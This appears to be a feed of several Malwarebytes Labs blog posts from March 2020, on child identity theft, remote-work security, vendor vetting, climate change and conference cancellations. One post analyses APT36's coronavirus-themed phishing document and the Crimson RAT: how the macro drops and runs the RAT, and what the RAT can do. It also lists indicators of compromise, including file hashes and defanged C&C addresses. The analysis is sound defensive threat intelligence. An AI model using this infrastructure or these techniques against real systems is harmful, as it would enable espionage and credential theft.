In a world where children as young as a single day old can fall prey to fraud, it is more important than ever to educate parents and other caretakers about the dangers of child identity theft. While the hope is that perceptions can be changed and criminals brought to justice, likely the biggest concern for parents is how to reclaim their child’s identity, should they ever be in such an unfortunate position.

That is, unless the parents or guardians are the ones behind the fraud in the first place. In part 1 of our series on child identity theft, we talked about familiar fraud—fraud committed by someone who personally knows the victim—and how children are increasingly being targeted for this crime. We also touched on the repercussions of familiar fraud in the lives of kids and their families.

In part 2 of our series, we look at turning back the tables and reclaiming your child’s identity, whether it’s been stolen by a stranger or someone who knows them. In addition, we highlight the signs your child’s information might be compromised and how parents or guardians can better protect their data.

Signs of child identity compromise

When it comes to figuring out if a child’s identity has been compromised and is being used, thankfully, there are telltale signs that parents and guardians can look out for. These signs are displayed both in the real world and the digital world. They include:

  • Physical mail arriving to your home that is addressed to your child. These include card applications, banking statements, and credit card or insurance applications for accounts under their name, and they’re the most obvious sign of compromise. Your child may also receive a notice from the IRS either because of unpaid income taxes or having multiple tax returns filed under their SSN.
  • Phone calls received from collection agencies directed to your child.
  • If the landline has a caller ID, your child’s name may appear on it. This indicates that someone has stolen and is misusing their information.
  • A turned-down application for government benefit for your child. This is because someone with the same SSN as your child may already be benefiting from it.
  • Bank turning down an account application for a child due to the negative credit score associated with the child’s SSN.
  • Important documents of your child suddenly going missing, including their SSD card and birth certificate.
  • In addition, the Identity Theft Resource Center (ITRC) has listed several documents that may suddenly show up—or, in certain cases, not show up—that potentially give away active ID theft activity.
How to reclaim your child’s identity

Reclaiming a stolen identity takes a lot of work. This is true whether the victim is an adult or a child. And the length of time spent undoing the harm to your child’s reputation potentially correlates with how long the fraud has been taking place before it was identified and acted upon.

If you, dear parent or guardian, have seen any of the telltale signs of identity fraud, immediately contact the top credit bureaus to freeze your child’s credit until they are old enough to enter into a contract. Doing so means that these reports will be taken out of circulation.

A credit report for a child is normally non-existent, but if one is found, the parent or guardian should contact an organization that deals with child identity theft, such as the Identity Theft Report. If a parent would only like to take extra precaution, they can ask their credit reporting agencies (CRA), which are Experian, Equifax, TransUnion, or other smaller bureaus to create their child’s credit report and freeze it.

It is equally important for parents and/or guardians to keep the PIN that each of these credit unions have assigned to them.

Beyond freezing and receiving credit reports, other important steps for reclaiming your child’s identity include:

  • Contacting any companies where fraudulent accounts in your child’s name were opened. Tell the fraud department about what happened, and ask them to close the account and send a letter confirming your child isn’t liable. If necessary, send a letter explaining your child is a minor who can’t enter into contracts and attach a copy of their birth certificate.
  • For parents in the United States, contacting the Federal Trade Commission (FTC) at or call 877-ID-THEFT to report the fraud.
How to protect your child’s identity

In the Experian survey report mentioned in part 1 of our series, more than half of victims (63 percent) wished that their parents had done more to protect them from potential fraud. Interestingly, 61 percent of parents felt the same way.

Awareness of the risks and underlying dangers of child identity theft is something parents should be actively practicing. To avoid opening an opportunity for fraudsters to take advantage of your child’s information, here are some tips:

  • Don’t carry your child’s SSN card. There is no need—keep it safe at home instead.
  • Know when your child’s SSN is really needed when applying for something on their behalf. Schools, for example, don’t ask for a child’s SSN, so there is no need to provide it.
  • When throwing out mail or documents with your personal information or your child’s, shred them before disposing.
  • You may also want to consider getting your child another form of identification, such as a passport or a state identification card.
  • If you receive news of your child’s school getting breached, don’t hesitate to call the school and ask for more information.
  • Inquire about your child’s school directory information policy. A directory information contains a lot of personally identifiable information (PII) about a child. And sometimes, such information is shared outside of the school. Parents and/or guardians can either inform the school that they shouldn’t share their child’s information without their expressed consent, or opt out of having their information shared.
  • Keep all important documents of your child in a safe and secure place.

Early detection is key. Getting acquainted with the red flags and keeping an eye out for them would nip fraud in the bud. Not only that, it’d make reclaiming and restoring a child’s identity back a little easier—emotionally, mentally, and financially.

Half of Experian respondents with children who have been victimized by fraud have learned the hard way not to share personal information with family. Some have also started actively checking credit scores and enrolling for identity theft protection services.

The things we leave behind

It’s easy for adults to forget that, like them, children have data and information that needs protecting, too. And even if their children are too young to use a computing device, they still have digital footprints. The reason? Mom and Dad or other legal guardians leave them behind. Unfortunately, it is unavoidable.

Mom needs to schedule a doctor’s appointment for the little one’s check-up, so she uses her healthcare app. Proud dad shares short clips of his bundle of joy with Aunt Martha, who lives far away and couldn’t visit the newborn in hospital. And before all of this, Mom and Dad announced the pregnancy to all their social media channels.

Sadly, the very activities that give us joy and make tasks convenient can also leave behind breadcrumbs that identity thieves can sniff out and follow. Rarely do parents or guardians stop to think about how their sharing can impact their child’s digital life.

Take, for example, baby pictures you may have shared on social media. They may contain metadata pointing to the location where they were taken. Or when you made that public announcement about your baby on the way: Did you also reveal their name? Fraudsters can easily glean from this information the baby’s full name and location. If they don’t have the child’s SSN yet, they can easily pair it with another SSN to create a synthetic identity.

This isn’t to say that parents and/or guardians should deprive relatives and friends of your little one’s adorable moments, or avoid entering any of their children’s information online. Just be mindful when doing so. Share privately by making use of your social network’s privacy settings. Also caution or remind your relatives and friends to avoid re-sharing media you post to others without your consent.

We’re all in this together

In this age of data breaches, it is easy for us to focus on the security of our own data. But let us be aware that kids and young adults are becoming more of a target, too. Children, especially, are blank slates—a highly-prized quality for someone with access to their information and with malicious intent. Hackers are after them; yet often, it’s those that are closer to them who cause the greatest harm—sometimes without knowing they are doing it. Worse, more than one person could be fraudulently using an innocent child’s identity.

While parents and guardians are advised to be equally vigilant in protecting the data of their children—biological and adopted ones—as much as their own or anyone else’s, we encourage any other responsible adult in the family to take part. If familiar fraud becomes a family problem, it should be a family affair to thwart it off at all costs for the future of the most vulnerable in the household.

The post Child identity theft, part 2: How to reclaim your child’s identity appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep2: On the challenges of managed service providers

Malware Bytes Security - Mon, 03/16/2020 - 11:28am

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to two representatives from an Atlanta-based managed service provider—a manager of engineering services and a data center architect—about the daily challenges of managing thousands of nodes and the future of the industry.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:
  • International Women’s Day: Is awareness of stalkerware, monitoring, and spyware apps on the rise?
  • How a Rocket Loader skimmer impersonates the CloudFlare library in a clever scheme
  • Securing the MSP: What are the best practices for vetting cybersecurity vendors?
  • Remote security, aka RemoteSec, and how to achieve on-prem security levels with cloud-based remote teams
  • How the coronavirus has impacted security conferences and events, including which were cancelled, postponed, or switched over to virtual
  • The effects of climate change on cybersecurity
Plus, other cybersecurity news:
  • FBI warning: Hackers are targeting Office 365, G Suite users with business email compromise attacks. (Source: SiliconAngle)
  • How poor IoT security is allowing the 12-year-old Conficker malware to make a comeback. (Source: ZDNet)
  • Recently discovered spear phishing emails are using HIV test results as a scare factor. (Source: ThreatPost)
  • Talkspace threatened to sue a security researcher over a bug report, and forced him to take down a blog post. (Source: TechCrunch)
  • Independent testing found Google’s Play Protect to be poor on malware protection. (Source: Forbes)
  • Researchers found thousands of fingerprint files exposed in an unsecured database. (Source: Cnet)
  • Researchers discovered a phishing page informing victims about fake Netflix service disruptions, supposedly due to problems with the victim’s payment method. (Source: Sucuri Blog)

Stay safe, everyone!

The post Lock and Code S1Ep2: On the challenges of managed service providers appeared first on Malwarebytes Labs.

Categories: Malware Bytes

APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT

Malware Bytes Security - Mon, 03/16/2020 - 11:00am

Since the coronavirus became a worldwide health issue, the desire for more information and guidance from government and health authorities has reached a fever pitch. This is a golden opportunity for threat actors to capitalize on fear, spread misinformation, and generate mass hysteria—all while compromising victims with scams or malware campaigns.

Profiting from global health concerns, natural disasters, and other extreme weather events is nothing new for cybercriminals. Scams related to SARS, H1N1 (swine flu), and avian flu have circulated online for more than a decade. According to reports from ZDnet, many state-sponsored threat actors have already started to distribute coronavirus lures, including:

  • Chinese APTs: Vicious Panda, Mustang Panda
  • North Korean APTs: Kimsuky
  • Russian APTs: Hades group (believed to have ties with APT28), TA542 (Emotet)
  • Other APTs: Sweed (Lokibot)

Recently, the Red Drip team reported that APT36 was using a decoy health advisory document to spread a Remote Administration Tool (RAT).

APT36 is believed to be a Pakistani state-sponsored threat actor mainly targeting the defense, embassies, and the government of India. APT36 performs cyber-espionage operations with the intent of collecting sensitive information from India that supports Pakistani military and diplomatic interests. This group, active since 2016, is also known as Transparent Tribe, ProjectM, Mythic Leopard, and TEMP.Lapis.

APT36 spreads fake coronavirus health advisory

APT36 mainly relies on both spear phishing and watering hole attacks to gain its foothold on victims. The phishing email is either a malicious macro document or an rtf file exploiting vulnerabilities, such as CVE-2017-0199.

In the coronavirus-themed attack, APT36 used a spear phishing email with a link to a malicious document (Figure 1) masquerading as the government of India ([.]email/?att=1579160420).

Figure 1: Phishing document containing malicious macro code

We looked at the previous phishing campaigns related to this APT and can confirm this is a new phishing pattern from this group. The names used for directories and functions are likely Urdu names.

The malicious document has two hidden macros that drop a RAT variant called Crimson RAT. The malicious macro (Figure 2) first creates two directories with the names “Edlacar” and “Uahaiws” and then checks the OS type.

Figure 2: malicious macro

Based on the OS type, the macro picks either a 32bit or 64bit version of its RAT payload in zip format that is stored in one of the two textboxes in UserForm1 (Figure 3).

Figure 3: embedded payloads in ZIP format

Then it drops the zip payload into the Uahaiws directory and unzips its content using the “UnAldizip” function, dropping the RAT payload into the Edlacar directory. Finally, it calls the Shell function to execute the payload.

Crimson RAT

The Crimson RAT has been written in .Net (Figure 4) and its capabilities include:

  • Stealing credentials from the victim’s browser
  • Listing running processes, drives, and directories on the victim’s machine
  • Retrieving files from its C&C server
  • Using custom TCP protocol for its C&C communications
  • Collecting information about antivirus software
  • Capturing screenshots
Figure 4: Crimson RAT

Upon running the payload, Crimson RAT connects to its hardcoded C&C IP addresses and sends collected information about the victim back to the server, including a list of running processes and their IDs, the machine hostname, and its username (Figure 5).

Figure 5: TCP communications Ongoing use of RATs

APT36 has used many different malware families in the past, but has mostly deployed RATs, such as BreachRAT, DarkComet, Luminosity RAT, and njRAT.

In past campaigns, they were able to compromise Indian military and government databases to steal sensitive data, including army strategy and training documents, tactical documents, and other official letters. They also were able to steal personal data, such as passport scans and personal identification documents, text messages, and contact details.

Protection against RATs

While most general users needn’t worry about nation-state attacks, organizations wanting to protect against this threat should consider using an endpoint protection system or endpoint detection and response with exploit blocking and real-time malware detection.

Shoring up vulnerabilities by keeping all software (including Microsoft Excel and Word) up-to-date shields against exploit attacks. In addition, training employees and users to avoid opening coronavirus resources from unvetted sources can protect against this and other social engineering attacks from threat actors.

Malwarebytes users are protected against this attack. We block the malicious macro execution as well as its payload with our application behavior protection layer and real-time malware detection.

Indicators of Compromise

Decoy URLs[.]email/?att=1579160420[.]email/?att=1581914657

Decoy documents


Crimson RAT

0ee399769a6e6e6d444a819ff0ca564ae584760baba93eff766926b1effe0010 b67d764c981a298fa2bb14ca7faffc68ec30ad34380ad8a92911b2350104e748


107.175.64[.]209 64.188.25[.]205 MITRE ATT&CK

The post APT36 jumps on the coronavirus bandwagon, delivers Crimson RAT appeared first on Malwarebytes Labs.

Categories: Malware Bytes

The effects of climate change on cybersecurity

Malware Bytes Security - Fri, 03/13/2020 - 2:55pm

Outside the coronavirus pandemic and its related healthcare and economic fallout, climate change and cybersecurity are seen by many as the two most urgent problems facing our planet now and in the near future. They are two distinct and separate problems, to be sure. There are some areas, however, where security and climate change overlap, interlock, and influence one another. Let’s have a look.

To understand how climate change and the methods to counteract its rapid ascent will affect cybersecurity, we first have to look at how computing contributes to global warming. Your first instinct about their relationship is probably right: computing involves energy consumption and heat production. As long as we cannot produce enough “clean energy” to satisfy our needs for electricity, the energy consumed by computing—and security within it—will continue to contribute to global warming.

The big energy consumers

There are a few fields in computing and cybersecurity that guzzle up huge amounts of energy and produce heat as a byproduct:

  • Supercomputers
  • Blockchain mining
  • Data centers
  • The Internet as a whole

Before you dismiss the problem of the supercomputers (because you assume there are only a few of them)—even I was astounded to find out that there are over 500 systems that deliver a petaflop or more on the High Performance Linpack (HPL) benchmark. Most of these supercomputers consume vast amounts of electrical power and produce so much heat that large cooling facilities must be constructed to ensure proper performance. But in recent years, vendors have started to produce supercomputers that are more energy efficient.

In 2019, the mining of Bitcoin alone consumed more energy than the entire nation of Switzerland, which equals about one quarter percent of the world’s entire energy consumption. There are many more blockchains and cryptocurrencies, although Bitcoin is by far the largest energy consumer among them. This is mostly due to their operation on the proof-of-work concept and the high value of Bitcoin.

While cybercrime experienced a huge jolt in cryptomining in 2018, the frenzy has mostly died down as Bitcoin value dipped and plateaued. However, cryptomining continues as both a legitimate and illegitimate activity—especially because miners can switch to other cryptocurrencies when Bitcoin drops off.

An even bigger impact on energy consumption are data centers, which already use over 2 percent of the world’s total energy consumption, and that number is expected to rise fast. The prediction is based on the growing number of content delivery networks (CDN), more Internet of Things (IoT) devices, the growth of the cloud, and other colocation services. So, not only do computer centers consume massive amounts of energy, their use is expected to grow astronomically.

The Internet can’t be completely separated from the data centers that enable it. But despite the overlap, it’s still worth mentioning that the total energy consumption of the Internet as a whole lies at around 10 percent, which is more than the world’s total energy production from renewable sources such as wind and solar.

However, it’s fair to note that the Internet has taken over a lot of tasks that would have cost more energy or created a greater carbon footprint if they had been performed in the “old ways.” Consider, for example, the energy saved by working remote: the energy expended on the Internet and inside one’s home is far less damaging than the carbon monoxide released into the atmosphere by fossil fuels from a daily commute to the office.

Global warming’s trickle down effects

Conversely, global warming and its effects on the climate, environment, and economy do have a direct impact on our everyday lives, and that trickles down to cybersecurity. Some of the projected dangers include:

  • Flooding of certain areas
  • Prolongation of the wild-fire season
  • Spread of diseases
  • Economic costs
  • Scarcity of fresh water in certain areas

By 2030, climate change costs are projected to cost the global economy $700 billion annually, according to the Climate Vulnerability Monitor. And The International Organization for Migration estimates that 200 million people could be forced to leave their homes due to environmental changes by 2050.

Climate change and its implications will act as a destabilizing factor on society. When livelihoods are in danger, this will spark insecurity and drive resource competition. This does not only have implications for physical security, but in modern society, this also has an impact on cybersecurity and its associated threats.

From a big picture, worst-case-scenario perspective, climate change could trigger profound international conflicts, which go hand-in-hand with cyberwar. Beyond nation-state activity, individuals that have no other means of providing for their families could turn to cybercrime, which is often seen as a low-risk activity with a potentially high yield.

But on a smaller scale, we’re already seeing the impacts of climate change on cybersecurity, whether via social engineering scare tactics embraced by threat actors or disruptions to Internet-connected home heating and cooling devices meant to track energy consumption.

Global warming scams

NO, we’re not saying that climate change is a hoax or a scam. But we want to issue a warning related to the subject. As with any newsworthy topic, there are and will be scammers trying to make a profit using the feeling of urgency that gets invoked by matters like climate change.

For example, the Intergovernmental Panel on Climate Change (IPCC) issued a warning against several scams abusing their name.

“IPCC has been made aware of various correspondences, being circulated via e-mail, from Internet Web sites, and via regular mail or facsimile, falsely stating that they are issued by, or in association with, IPCC and/or its officials. These scams, which may seek to obtain money and/or in many cases personal details from the recipients of such correspondence, are fraudulent.”

Natural disaster scams are increasing in the same frequency as natural disasters themselves, often claiming to be collecting donations for a particular cause but putting money in their own pockets instead. We’ve seen social engineering tricks ranging from phishing emails and malspam to social media misinformation campaigns on hurricanes, tornadoes, fires, and flooding. Expect this sort of gross capitalization on tragedy and fear to continue as the effects of climate change become more dramatic.

Improving efficiency and preparing for changes

The number of datacenters is down, but their size has grown to meet the demand. This is potentially a step in the right direction since it decreases the power needed for the overhead, but not as big as the step that could be made if they would actually work on their power efficiency.

Online companies typically run their facilities at maximum capacity around the clock, regardless of the demand. As a result, data centers are wasting 90 percent or more of their power. Smart management could make a substantial difference in energy consumption and costs.

Cryptomining could improve on energy consumption if the most popular currencies would not be based on proof of work but proof of stake. Proof of work rewards the largest number of CPU cycles with that the highest energy consumption.

NEO and Hyperledger are next generation blockchain technologies with much lower electricity cost. NEO uses what it calls delegated Byzantine Fault Tolerance (dBFT), which is an optimized proof-of-stake model. Hyperledger Fabric centralizes block creation into a single resource pool and has multiple validators in the participants. It’s an enterprise collaboration engine, using blockchain smart contracts, where validation is much easier than creation, and creation will be centralized on a single, optimized platform.

More effective methods of cooling would both help supercomputers and large data centers. At the moment, we are (ironically) using electricity to power cooling systems to control the heat caused by electricity usage. In fact, cooling gobbles up about 35 percent of the total power in high performance computing with air cooled systems. Hot-water liquid cooling might be a key technology in future green supercomputers as it maximizes cooling efficiency and energy reuse.

Interaction between climate change and cybersecurity

As we have seen, there are opportunities for those in security and computing to slow the progression of climate change. But there are also opportunities for those in cybercrime to take advantage of the destabilization caused by climate change, as some already have through related scams and malware campaigns. As long as we don’t drop security in attempts to counteract global warming, we’ll be able to protect against some of the more advanced threats coming down the pike. But while we still can, let’s rein in our carbon footprint, improve on computing efficiency, and remember our cybersecurity lessons when criminals come calling.

Stay safe, everyone!

The post The effects of climate change on cybersecurity appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Coronavirus impacts security conferences and events: check your schedule

Malware Bytes Security - Thu, 03/12/2020 - 2:02pm

With coronavirus starting to take hold globally, international travel restrictions are kicking in and more workplaces are advising to work from home whenever possible. When self-isolation is a potential solution, public gatherings are increasingly looking like a terrible idea. Events are becoming a bit of a hotspot for cases, leading to inevitably bizarre scenarios where coronavirus conferences are cancelled due to coronavirus.

Many major security conferences are already reassessing whether going ahead is worth it. Indeed, some cases of coronavirus have already been confirmed at RSA—one of the biggest security events on the planet. Given the number of attendees and the nature of their jobs (government and private security officials), that alone could have repercussions galore.

Some security events have decided to cancel outright, while others are going with the “temporarily postpone and see what happens at a later date” approach. While it’s tempting to suggest “just going virtual” as some are doing, that’s not always easily achieved.

Cancel, postpone, or virtual

Here’s a short rundown of some problems faced by event organisers in the wake of the current pandemic:

1) Putting on an event costs a lot of money. The venue, advertising, food, setup, safety, insurance, transportation to and from the event for organisers—it all adds up. People pay a ton of cash in advance to secure the event location, and not every venue operator is willing to hand $100,000 back if an event organiser phones up and says, “Actually, about that global pandemic…”

2) Lots of smaller conferences rely on sponsors. If sponsors suddenly bail without considering the impact of vanishing, the event could easily go under, and it won’t get a second attempt the following year. In turn, this (combined with the difficulty in recovering venue fees) could force some events into going ahead or facing financial ruin. It’s in everyone’s best interest to work together as much as possible in those situations, and see if there’s a possibility of going virtual.

3) I’ve helped with a few online events in the past—only small ones—and it was difficult. You can’t just throw up a website and yell “job done!” Streaming can be expensive. Locking down the site and figuring out how to only give content to paying virtual attendees isn’t straightforward. Which time zone are you aiming for when the event happens, and do you even need to stream?

It’s all online anyway, so would it be better to simply record everything and lock it behind a portal somewhere? What software will you use? Does your license accommodate your plans? Can you afford an upgrade if it doesn’t? Will the tech go wrong during the event, and what sort of contingency plans are in place if it does? These are just some of the questions waiting in store for intrepid event folks.

Taking stock of the situation

It’s difficult enough running a virtual event from scratch. I can’t imagine the stress of finding out you suddenly have to switch everything to online or shut everything down at short notice.

While it may end up costing less than a physical event, it may well cause more headaches than planning for the real world, where there’s a fairly solid set of event planning criteria/expectations.

With this in mind, and with a growing collection of security events going into lockdown, we thought it’d be good to pass you a few handy lists that explain what’s going on in security conference land for the foreseeable future. 

The current state of play

In a nutshell, the current state of play is “bad.” Wild West Hackin’ Fest is one such example of an event having to cancel and losing a lot of money in doing so to keep people safe from harm. They’ve decided to go virtual, just like Kernelcon who announced their decision today to do the same thing. Good luck to them both.

Meanwhile, the first major roundup of affected events over on ZDNet grew from nine to 22 in just two days. As per the list itself, some notable changes to your potential event schedule:

  • Black Hat Asia and DEF CON China are both postponed
  • Notable BSides events, including Budapest and Vancouver, are postponed, though Charm (Baltimore) is giving the option to go virtual alongside real-world presenting
  • Kaspersky’s incredibly popular Security Analyst Summit is also postponed
  • Infosecurity Belgium, a huge trade event, has been postponed

Those are just some of the big shakeups heading the infosec industry’s way. That list is constantly being updated, as is the comprehensive listing by region over on Infosecurity Conferences.

More disruption is likely

Regardless of which list you use to keep yourself informed, there will absolutely be more events affected in days to come. Your workplace may already have implemented no-travel policies, but even if you’re going it alone, you may wish to give some events a pass this time around.

Of course, that advice isn’t exactly good news for people who make their living from organising these events or even speaking at them. Whatever your involvement in security conferences, it’s going to be a rough old time of it for the foreseeable future. Stay safe and be well.

The post Coronavirus impacts security conferences and events: check your schedule appeared first on Malwarebytes Labs.

Categories: Malware Bytes

RemoteSec: achieving on-prem security levels with cloud-based remote teams

Malware Bytes Security - Thu, 03/12/2020 - 12:53pm

The world of work is changing—by the minute, it feels these days. With the onset of the global coronavirus pandemic, organizations around the world are scrambling to prepare their workforce, and their infrastructure, for a landslide of remote connections. This means that the security perimeter of businesses small and large has transformed practically overnight, requiring IT leaders to rethink the way they’re protecting their organizations. 

Even before the spread of the virus, preparing business security protocols for a mixture of remote and on-premise work had become a forgone conclusion. With increasing globalization and connectedness, remote work is fast supplementing, if not outright replacing, traditional 9-5 office-based hours. Upwork Global predicts that by 2028, up to 78 percent of all departments will have remote workers. 

This trend is affecting companies of all sizes. In fact, a study by Owl Labs indicates that smaller companies are twice as likely to hire full-time remote workers, and a State of Telecommuting study found that telecommuting grew by 115 percent over the last decade. 

These numbers clearly show that remote work is here to stay, whether in quick response to dire crises or simply as a slow, societal shift. What companies are now grappling with is how to manage a ballooning remote workforce, and more so, the security challenges that come with that growth. 

In the past, traditional work made it easy to create and enforce on-prem security policies. Simple controls like logical and physical access were handled through a centralized command and control hierarchy. As workforces become increasingly distributed, such security hierarchies are starting to underdeliver. Companies are now faced with novel security challenges posed by the diverse work conditions remote workers operate within. 

The rise of RemoteSec

Remote Security, or RemoteSec, is a set of security tools, policies, and protocols that govern the IT infrastructure supporting remote teams. As most remote workers heavily rely heavily on cloud tools and platforms, RemoteSec addresses security challenges that almost always fall under this category, though other tools, such as virtual private networks (VPNs) play a role, as they are often deployed to establish secure connections to the cloud. 

For any business working with remote teams, understanding the role cloud security plays in securing remote teams is crucial to realizing overall remote security. However, one challenge that remains is how to replicate the success of on-prem security within a cloud environment. 

Before we delve into the details of RemoteSec, it’s crucial to note the difference between RemoteSec and overall cybersecurity policy. While both deal with securing networked resources, RemoteSec focuses mostly on securing remote teams and the cloud resources they use. As such, organizations with cybersecurity policies may need to extend them to cover security issues that emerge when remote workers relying on cloud infrastructure are added to the workforce matrix. 

Crucial RemoteSec considerations

Remote workers—which include freelancers, contractors, or in-house employees working from home, in coworking spaces, or at coffee shops—do their jobs under a diverse set of conditions. These unique and unpredictable conditions form the body of challenges RemoteSec addresses. 

For example, 46 percent of staff members admit to moving files between work and personal computers while working from home. A further 13 percent admit to sending work emails via personal email addresses because they are unable to connect to an office network. 

With these challenges in mind, here are some crucial RemoteSec considerations you should focus on to secure your remote teams. 

Global location of employees

Remote workers that are spread across the globe face different security challenges. As each part of the world has its own unique IT infrastructure characteristics, it is essential to standardize remote work environments for your entire team. Using VPNs and virtual desktops can help provide a uniform and secure work environment for your remote team, despite their location in the world. 

Remote data security policies

Data security is a significant challenge when working with remote teams. For example, remote workers may access public unsecured Wi-Fi hotspots, exposing company data to eavesdroppers or cybercriminals. Also, remote workers may use free data storage tools like Google Drive without knowing that such tools are vulnerable to ransomware attacks.

RemoteSec addresses these issues through comprehensive cloud data policies that cover remote data access, public hotspots, USB devices, password management, device management, network compliance, and others. 

IT and network infrastructure

Endpoint security is another area that organizations must address when it comes to RemoteSec. Remote workers tend to use multiple endpoints (devices) to access company resources. However, in many instances, these devices may not be secure or may be connecting through unsecured network channels.

Issuing mobile device management (MDM) policies, using secure VPNs, deploying cloud-based endpoint security on all remote devices, and enforcing secure cloud network protocols can ensure remote workers do not circumvent network or endpoint security measures. 

Remote IT support

Not all remote workers are tech-savvy. As more roles move to remote, non-technical remote workers may face challenges accessing IT support. If a remote worker halfway across the world experiences technical problems, they may turn to non-secure, outside IT support, exposing your company’s confidential resources. Using cloud tools to deliver IT support can help maintain seamless security across your technical and non-technical remote workforce. 

On-prem security tools vs. cloud-based RemoteSec 

Most companies extol the virtues of on-prem security and rightly so. On-prem security is the gold standard of information security. However, that standard falls apart when stood up against today’s hybrid workforce of remote teams and in-house professionals using a diverse range of endpoints—especially when that workforce is quickly ushered back into their homes for safety purposes. Why? Because on-prem security protocols are designed to contain information in an airtight box. 

Cloud and remote teams not only open that box, but they also turn the organization into an open platform with multiple access points and endpoints. So, how can an organization achieve on-prem security levels with remote teams in the cloud? The answer lies in using the right security tools to migrate your organization from an on-prem mindset to one that considers remote security equally. 

Cloud security tools include desktop infrastructure, file system snapshots, remote data and activity monitoring, and remote device encryption and data wipes. Such mechanisms not only safeguard company data, but give more control over IT resources used by remote workers.

In addition, deploying a single-sign on service with multi-factor authentication can better protect company data stored in the cloud, as well as assist in access management. VPNs, both desktop and mobile, can further provide authentication while also encrypting network traffic and obscuring private details, which may be necessary while connecting in public places.

A massive shift

Cloud services, at once the hero and villain of information security, will prove to be an ace up the sleeve for companies transitioning away from underperforming on-prem security standards. While remote work seems to have caught on—and is sometimes necessary—we are only at the beginning of a massive tectonic shift in how work is done. 

RemoteSec, therefore, is an emerging security field in security, one that’s been discussed for years but never quite tested to this degree. As organizations gain more remote workers, the need to embrace RemoteSec at the forefront of cybersecurity policy will only escalate. Addressing the crucial areas outlined above can help organizations mitigate the emerging risks while embracing a remote workforce. 

The post RemoteSec: achieving on-prem security levels with cloud-based remote teams appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Securing the MSP: best practices for vetting cybersecurity vendors

Malware Bytes Security - Wed, 03/11/2020 - 11:44am

Ironically, to keep costs low for their enterprise and mid-market clients, managed service providers (MSPs) are some of the most reliant on third-party vendors—including those providing security. While this is generally not an indication of dysfunction or vulnerability, the responsible MSP will be looking with a critical eye while vetting cybersecurity vendors to evaluate how they might increase the organization’s attack surface—especially with the uptick in targeted attacks over the last few months.

So how should an MSP—or any organization, for that matter—evaluate cybersecurity vendors not just for budget and effectiveness, but also security posture? And how can MSPs continue to monitor their security partners as product features and organizational needs change over time?

What’s concerning from a Chief Security Officer’s (CSO’s) perspective is the veneer of legitimacy many cybersecurity vendors are capable of producing: Scammy security companies generally have slick, professional websites, convincing sales engineers, legions of onshore support administrators, and almost invariably, one or more executives with ties to a government intelligence agency, whether in the US or abroad.

Given that almost all cybersecurity companies on the market strive to project an image of professionalism, how can a CSO sort out companies that are a value add from those with a less than legitimate business model? And what about the companies that are above board, but just not very good? Let’s take a look.

The ugly cybersecurity vendors

Most harmful to a business in the long run are the cybersecurity vendors who either don’t do much, or have a business model that skirts the edge of the law. The simplest and most cost effective way of avoiding these companies is conducting a community temperature check.

Bad vendors tend to acquire a collective disapproval in the infosec community long before their business model fails. A quick Twitter or Google search of the vendor name can often reveal detailed accounts by analysts who have used them and can provide candid assessments.

But the gold standard for a temperature check is to ask your own team. Cross-pollination of infosec personnel is at an all time high. As such, your team most likely has a broad range of experience with multiple vendors on a host of platforms.

Your team can provide invaluable data, like added operations costs over the long term, company billing practices, and interoperability with existing systems. They can also tip you off on issues with vaporware; generally defined as giving the appearance of having a product/feature, which is in reality much more limited or even non-existent.

Like most vendors of higher quality, the ugly will also have former intelligence agency personnel to give themselves a veneer of authority and competence. A question that rarely gets asked, though, is “Which agency?” Is it an agency with a formal mandate for addressing cyberthreats, with an established university pipeline and well-regarded reputation? Is it an agency whose cyber division was stood up relatively recently, with repurposed employees from other departments?

Further, how relevant is that experience to your business needs? If the majority of your security losses are coming from phishing and malvertising, is having access to analysts experienced in state-sponsored intrusions really relevant?

The bad cybersecurity vendors

Some infosec vendors really do try their best to provide a valuable product to the end user, but still fall awfully short of the mark. The problem here isn’t that they’re not trying to deliver a good product—it’s that they don’t necessarily understand what “good” is to you.

In the public sector, intelligence is often defined as information that is timely, accurate, and relevant. This applies to cyberthreat intelligence derived from security products as well. If you kick out any one of the legs on the threat intelligence tripod, you’re left with a platform too unstable to make any reliable judgement on cyber risk.

An organizational threat delivered to SOC personnel in a timely manner that hasn’t been vetted (i.e. is inaccurate) is not intelligence. Threat data that is timely and accurate, but not adapted to your business vertical (i.e is irrelevant) is also not intelligence.

What these threat alerts amount to tends to be a drag on organizational resources, as in-house security personnel are tasked with vetting ever-increasing quantities of data that don’t address business needs. Don’t those tier-two SOC techs have better things to do than retrace vague, un-targeted analysis?

Bad cyberthreat intel vendors often correctly identify the desired end goal of intelligence, but lack an understanding of appropriate methodology. Again, these companies often out themselves as undesirable with a quick community check.

A poorly-sourced, unreviewed report using inflated claims will quickly reveal itself as such when the infosec community reviews the content. Timely, accurate, and relevant threat data will be shared, retweeted, and commented upon much more frequently then less useful sources. Pausing for a moment to see how other organizations have integrated threat data being offered to you can provide a valuable check against letting a bad vendor slip through the cracks.

Some questions to ask the sales engineer:

  • How will this data be tailored to my organization?
  • How is the data delivered to us, and if it’s a portal, what is your upgrade release schedule?
  •  And most importantly: How do you vet your sources?

Note: do not accept “We have to protect our sources and methods.” This is a phrase borrowed from government intelligence, who generally uses it in situations involving threats to human lives. More commonly, it’s used to express sentiments akin to “I’m not going to tell you because I don’t want to, don’t know, or it would embarrass me.”

The good cybersecurity vendors

Here’s the most difficult category and the holy grail for augmenting your security team: a company that delivers well-targeted services to your organization in a manner that is timely, accurate, and relevant. The catch here is that to properly spot the good company, your own organization has to have timely, accurate, and relevant defined down to a T. This brings us to the last and most important aspect of vetting: metrics.

Certain companies can provide an awfully impressive “real-time demonstration” of the product, sometimes offering you a head-to-head with competing products. They might reference the number of threats detected, speed of detections, analysis, or number of endpoints providing data.

There is a barrage of cybersecurity metrics available to benchmark performance, so how do you know which are valuable? The answer is: none of them. The only metric relevant to evaluate security performance is that which has been generated by your own team against a mature risk tolerance posture. Vendor metrics can’t possibly address the various risk tolerances of all their customers and therefore can’t be relevant to how they would perform for you. Once you know your own metrics, evaluating vendors can be a piece of cake. (And requires much fewer meetings.)

Some questions to ask the relationship manager for a great vendor:

  • How can I share feedback from my security team?
  • When can we revisit my business needs?
  • What improvements do you have planned for next quarter?

